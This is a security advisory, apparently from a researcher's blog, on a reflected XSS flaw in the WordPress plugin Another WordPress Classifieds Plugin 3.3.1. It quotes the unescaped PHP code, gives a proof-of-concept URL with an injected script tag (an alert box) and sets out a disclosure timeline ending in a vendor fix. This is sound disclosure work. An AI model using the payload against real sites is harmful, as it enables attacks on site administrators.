09-12-2014 / Vulnerabilities

Another WordPress Classifieds Plugin 3.3.1 Reflected XSS

$_GET['error_message'] is not escaped.

File: another-wordpress-classifieds-plugin\admin\admin-panel-settings.php

if ( isset( $_GET['code_error'] ) && isset( $_GET['error_message'] )  ) {
	$errors[] = sprintf( __( 'AWPCP could not obtain a valid access token from Facebook: %s', 'AWPCP' ), $_GET['error_message'] );
} else if ( isset( $_GET['code_error'] ) ) {
	$errors[] = __( 'AWPCP could not obtain a valid access token from Facebook. Please try again.', 'AWPCP' );
}

Proof of Concept

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=awpcp-admin-settings&g=facebook-settings&code_error=1&error_message=<script>alert(String.fromCharCode(88,83,83));</script>

Timeline

11-11-2014: Discovered
11-11-2014: Vendor notified
11-11-2014: Version 3.3.2 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ